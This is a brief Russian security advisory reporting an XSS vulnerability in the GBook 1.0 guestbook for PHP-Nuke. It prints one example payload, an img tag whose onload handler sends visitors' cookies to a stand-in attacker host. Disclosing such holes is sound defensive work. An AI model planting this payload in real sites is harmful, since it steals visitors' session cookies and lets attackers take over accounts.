Программа: GBook 1.0 

Уязвимость обнаружена в гостевой книге GBook для PHP-Nuke. Удаленный пользователь может выполнить XSS нападение. 

Пример: 

<img src="https://xakep.ru/wp-content/uploads/post/21157/images/pix.gif" width="1" height="1" onload="waraxe.src='http://attacker.com/steal.php?stuff='
+escape(document.cookie);">

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии